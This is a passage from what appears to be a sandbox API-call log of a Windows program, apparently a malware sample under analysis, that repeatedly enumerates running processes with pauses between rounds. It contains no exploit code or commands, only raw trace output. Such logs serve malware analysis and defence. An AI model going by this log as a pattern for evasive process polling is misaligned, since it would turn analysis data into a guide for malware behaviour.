out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0214.413] Process32NextW (in: hSnapshot=0x154, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0214.414] Process32NextW (in: hSnapshot=0x154, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0214.414] Process32NextW (in: hSnapshot=0x154, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0214.414] Process32NextW (in: hSnapshot=0x154, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0214.415] Process32NextW (in: hSnapshot=0x154, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0214.415] Process32NextW (in: hSnapshot=0x154, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0214.415] Process32NextW (in: hSnapshot=0x154, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x174, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0214.416] Process32NextW (in: hSnapshot=0x154, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x174, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0214.416] Process32NextW (in: hSnapshot=0x154, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x174, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0214.416] Process32NextW (in: hSnapshot=0x154, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x24c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0214.417] Process32NextW (in: hSnapshot=0x154, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0214.417] Process32NextW (in: hSnapshot=0x154, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0214.417] Process32NextW (in: hSnapshot=0x154, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x33c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0214.418] Process32NextW (in: hSnapshot=0x154, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x364, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x27, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0214.418] Process32NextW (in: hSnapshot=0x154, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0214.418] Process32NextW (in: hSnapshot=0x154, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0214.419] Process32NextW (in: hSnapshot=0x154, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0214.419] Process32NextW (in: hSnapshot=0x154, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x1a8, pcPriClassBase=8, dwFlags=0x0, szExeFile="userinit.exe")) returned 1 [0214.419] Process32NextW (in: hSnapshot=0x154, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x33c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0214.420] Process32NextW (in: hSnapshot=0x154, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x458, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x43c, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0214.420] Process32NextW (in: hSnapshot=0x154, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x47c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0214.420] Process32NextW (in: hSnapshot=0x154, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0214.421] Process32NextW (in: hSnapshot=0x154, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0214.421] Process32NextW (in: hSnapshot=0x154, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="ONENOTEM.EXE")) returned 1 [0214.421] Process32NextW (in: hSnapshot=0x154, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x524, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 1 [0214.422] Process32NextW (in: hSnapshot=0x154, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x68c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0214.422] Process32NextW (in: hSnapshot=0x154, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x74c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sjfhjjskfsf.exe")) returned 1 [0214.422] Sleep (dwMilliseconds=0x64) [0214.561] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x158 [0214.563] Process32FirstW (in: hSnapshot=0x158, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0214.563] Process32NextW (in: hSnapshot=0x158, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0214.564] Process32NextW (in: hSnapshot=0x158, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0214.564] Process32NextW (in: hSnapshot=0x158, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0214.564] Process32NextW (in: hSnapshot=0x158, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0214.565] Process32NextW (in: hSnapshot=0x158, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0214.565] Process32NextW (in: hSnapshot=0x158, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0214.565] Process32NextW (in: hSnapshot=0x158, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x174, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0214.566] Process32NextW (in: hSnapshot=0x158, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x174, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0214.566] Process32NextW (in: hSnapshot=0x158, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x174, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0214.566] Process32NextW (in: hSnapshot=0x158, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x24c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0214.567] Process32NextW (in: hSnapshot=0x158, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0214.567] Process32NextW (in: hSnapshot=0x158, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0214.567] Process32NextW (in: hSnapshot=0x158, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x33c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0214.568] Process32NextW (in: hSnapshot=0x158, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x364, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x27, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0214.568] Process32NextW (in: hSnapshot=0x158, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0214.568] Process32NextW (in: hSnapshot=0x158, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0214.569] Process32NextW (in: hSnapshot=0x158, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0214.569] Process32NextW (in: hSnapshot=0x158, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x1a8, pcPriClassBase=8, dwFlags=0x0, szExeFile="userinit.exe")) returned 1 [0214.569] Process32NextW (in: hSnapshot=0x158, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x33c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0214.570] Process32NextW (in: hSnapshot=0x158, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x458, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x43c, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0214.570] Process32NextW (in: hSnapshot=0x158, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x47c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0214.570] Process32NextW (in: hSnapshot=0x158, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0214.571] Process32NextW (in: hSnapshot=0x158, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0214.571] Process32NextW (in: hSnapshot=0x158, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="ONENOTEM.EXE")) returned 1 [0214.571] Process32NextW (in: hSnapshot=0x158, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x524, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 1 [0214.572] Process32NextW (in: hSnapshot=0x158, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x68c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0214.572] Process32NextW (in: hSnapshot=0x158, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x74c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sjfhjjskfsf.exe")) returned 1 [0214.572] Sleep (dwMilliseconds=0x64) [0214.710] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x15c [0214.712] Process32FirstW (in: hSnapshot=0x15c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0214.712] Process32NextW (in: hSnapshot=0x15c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0214.713] Process32NextW (in: hSnapshot=0x15c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0214.713] Process32NextW (in: hSnapshot=0x15c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0214.713] Process32NextW (in: hSnapshot=0x15c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0214.714] Process32NextW (in: hSnapshot=0x15c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0214.714] Process32NextW (in: hSnapshot=0x15c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0214.714] Process32NextW (in: hSnapshot=0x15c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x174, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0214.715] Process32NextW (in: hSnapshot=0x15c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x174, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0214.715] Process32NextW (in: hSnapshot=0x15c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x174, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0214.715] Process32NextW (in: hSnapshot=0x15c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x24c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0214.716] Process32NextW (in: hSnapshot=0x15c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0214.716] Process32NextW (in: hSnapshot=0x15c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0214.716] Process32NextW (in: hSnapshot=0x15c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x33c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0214.717] Process32NextW (in: hSnapshot=0x15c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x364, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x27, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0214.717] Process32NextW (in: hSnapshot=0x15c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0214.718] Process32NextW (in: hSnapshot=0x15c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0214.718] Process32NextW (in: hSnapshot=0x15c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0214.718] Process32NextW (in: hSnapshot=0x15c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x1a8, pcPriClassBase=8, dwFlags=0x0, szExeFile="userinit.exe")) returned 1 [0214.718] Process32NextW (in: hSnapshot=0x15c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x33c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0214.719] Process32NextW (in: hSnapshot=0x15c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x458, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x43c, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0214.719] Process32NextW (in: hSnapshot=0x15c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x47c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0214.719] Process32NextW (in: hSnapshot=0x15c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0214.720] Process32NextW (in: hSnapshot=0x15c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0214.720] Process32NextW (in: hSnapshot=0x15c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="ONENOTEM.EXE")) returned 1 [0214.720] Process32NextW (in: hSnapshot=0x15c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x524, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 1 [0214.721] Process32NextW (in: hSnapshot=0x15c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x68c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, 